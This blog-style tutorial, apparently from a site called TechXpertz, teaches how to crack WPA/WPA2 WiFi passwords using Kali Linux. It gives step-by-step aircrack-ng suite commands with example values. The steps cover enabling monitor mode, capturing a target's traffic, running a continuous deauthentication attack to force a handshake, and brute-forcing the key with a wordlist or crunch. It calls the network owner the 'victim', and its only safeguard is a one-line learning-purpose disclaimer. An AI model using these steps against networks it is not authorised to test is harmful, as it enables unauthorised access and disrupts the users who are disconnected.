Searching for method to crack WiFi WPA ?? the article is only for you then. Hacking ,one of the most popular term among teenagers. Nowadays people are by heart interested in pentration testing. if you have interest in ethical hacking or you can say Penetration testing you can earn allot. In this post i will just describe to crack wifi wpa after complete reading the tutorial you will fell Amazing WiFi cracking power in your hands!!.We are using kali linux pentration testing OS.
- What is kali linux, basics of kali linux pentration testing.
- Where to start learning hacking.(How to became Ethical hacker)
Note:- This tutorial is just for learning purpose ,Hence TechXpertz will not be responsible if tutorial used for criminal purpose.
Lets Start, Crack wifi wpa
What we are going to do is:-
So,The pentration testing process is going to be:-
- First of all we will start our pentest from collecting packets from our victim’s Wifi.
- If the user is connected to wifi. We will perform an deauth-attack(Therefore Disconnectiong users from wifi router ).
- When we turn off our deauth-attack .Victim’s phone/laptop will try to connect again .As the device authenticate with router .We will Get Handshke because authentication requires key.But the key is in encrypted form.
- finally we have key in encrypted form .We will now perform dictionary attack on the encrypted key and as the key match.We will get the password.
What is a WPA/WPA2 Wifi network?
Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are latest securities used by routers to secure WiFi networks.I am not going in detail you can just google it for geeky theory.
Lets Start Cracking WPA/WPA2 i mean Pentesting:-
- Fire up teminal and start the wireless interface in monitor mode.
Command :- airmon-ng start wlan0
Notice that airmon-ng enabled monitor-mode on wlan0mon.
So, the correct interface name to use in later parts of the tutorial is wlan0mon.
- Have a look at the packets passing in air.
Command :- airodump-ng wlan0mon
As a result all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen :
Copy BSSID and Channel of the victim.
Command :- airodump-ng -c “victim’s channel” –bssid “victim’s bssid” -w “file name” wlan0mon
example: airodump-ng -c 1 –bssid 90:8D:78:0F:3B:0F -w Wireless wlan0mon
- -c : The channel for the wireless network.
- –bssid : The MAC address of the access point.
- -w : The file name prefix for the file which will contain authentication handshake.
- -wlan0mon : The wireless interface.
Finally wait 2 minutes,IF you successfully captured handshake skip step 3.
- Since we do not have handshake yet, we will use aireplay-ng and deauth the victim ,Due to the device’s reconnection we will get handshake.
command : aireplay-ng -0 0 -a “Bssid of Victim” wlan0mon
Example : aireplay-ng -0 0 -a 90:8D:78:0F:3B:0F wlan0mon
- As a result we have HandShake, we will now attack using aircrack-ng.
Command : aircrack-ng -w “dictionary’s location” -b “victim’s bssid” “handshake(.cap) file”
example:aircrack-ng -w wordlist.dic -b 90:8D:78:0F:3B:0F WPAcrack.cap
4.(alternative) rather than dictionary we can use piping crunch .
Command : Crunh “lenght” options |aircrack-ng -w- -b”victim’s BSSID HANDSHAKE_FILE”